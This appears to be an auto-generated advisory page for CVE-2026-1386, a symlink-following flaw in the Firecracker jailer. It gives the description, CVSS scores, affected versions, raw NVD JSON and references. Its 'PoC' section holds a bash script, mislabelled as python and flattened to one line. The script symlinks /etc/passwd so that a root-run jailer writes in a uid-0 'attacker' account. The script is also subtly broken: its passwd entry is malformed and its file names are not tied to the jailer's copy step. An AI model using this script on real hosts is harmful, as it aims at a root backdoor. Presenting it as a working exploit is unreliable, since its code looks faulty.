Security Vulnerability Report
中文
CVE-2026-1386 CVSS 6.0 MEDIUM

CVE-2026-1386

Published: 2026-01-23 21:15:51
Last Modified: 2026-01-30 16:57:57
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

A UNIX symbolic link following issue in the jailer component in Firecracker version v1.13.1 and earlier and 1.14.0 on Linux may allow a local host user with write access to the pre-created jailer directories to overwrite arbitrary host files via a symlink attack during the initialization copy at jailer startup, if the jailer is executed with root privileges. To mitigate this issue, users should upgrade to version v1.13.2 or 1.14.1 or above.

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:amazon:firecracker:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:amazon:firecracker:1.14.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:amazon:firecracker:1.14.0:dev:*:*:*:*:*:* - VULNERABLE
Firecracker < v1.13.2
Firecracker v1.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2026-1386 PoC - Firecracker jailer symlink attack # Prerequisites: Local user with write access to jailer directories # Target: Firecracker v1.13.1 or earlier, v1.14.0 JAILER_DIR="/path/to/jailer/dir" TARGET_FILE="/etc/passwd" MALICIOUS_CONTENT="attacker:x:0:root:/root:/bin/bash\n" # Step 1: Create symlink to overwrite host file echo "[+] Creating malicious symlink..." ln -sf $TARGET_FILE $JAILER_DIR/malicious_link # Step 2: Prepare content to be copied cat > $JAILER_DIR/malicious_content << EOF $MALICIOUS_CONTENT EOF # Step 3: Wait for jailer to start (triggered by root user) echo "[!] Waiting for jailer initialization..." echo "[!] When jailer starts with root privileges, it will follow the symlink" echo "[!] and overwrite $TARGET_FILE with malicious content"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1386", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-01-23T21:15:51.397", "lastModified": "2026-01-30T16:57:56.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A UNIX symbolic link following issue in the jailer component in Firecracker version v1.13.1 and earlier and 1.14.0 on Linux may allow a local host user with write access to the pre-created jailer directories to overwrite arbitrary host files via a symlink attack during the initialization copy at jailer startup, if the jailer is executed with root privileges. \n\nTo mitigate this issue, users should upgrade to version v1.13.2 or 1.14.1 or above."}, {"lang": "es", "value": "Un problema de seguimiento de enlaces simbólicos de UNIX en el componente jailer en Firecracker versión v1.13.1 y anteriores y 1.14.0 en Linux puede permitir a un usuario local del host con acceso de escritura a los directorios precreados del jailer sobrescribir archivos arbitrarios del host a través de un ataque de enlace simbólico durante la copia de inicialización al inicio del jailer, si el jailer se ejecuta con privilegios de root.\n\nPara mitigar este problema, los usuarios deben actualizar a la versión v1.13.2 o 1.14.1 o superior."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:N/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:amazon:firecracker:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.13.2", "matchCriteriaId": "F5711475-1683-4678-A801-CEE4DD77C20E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:amazon:firecracker:1.14.0:-:*:*:*:*:*:*", "matchCriteriaId": "C1831DAD-F5BB-42AF-8CD4-EA9CD67C1247"}, {"vulnerable": true, "criteria": "cpe:2.3:a:amazon:firecracker:1.14.0:dev:*:*:*:*:*:*", "matchCriteriaId": "0067E934-76C2-4FE3-AA7E-9BD7C8C98135"}]}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-003-AWS/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/firecracker-microvm/firecracker/releases/tag/v1.13.2", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes", "Product"]}, {"url": "https://github.com/firecracker-microvm/firecracker/releases/tag/v1.14.1", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Release Notes", "Product"]}, {"url": "https://github.com/firecracker-microvm/firecracker/security/advisories/GHSA-36j2-f825-qvgc", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.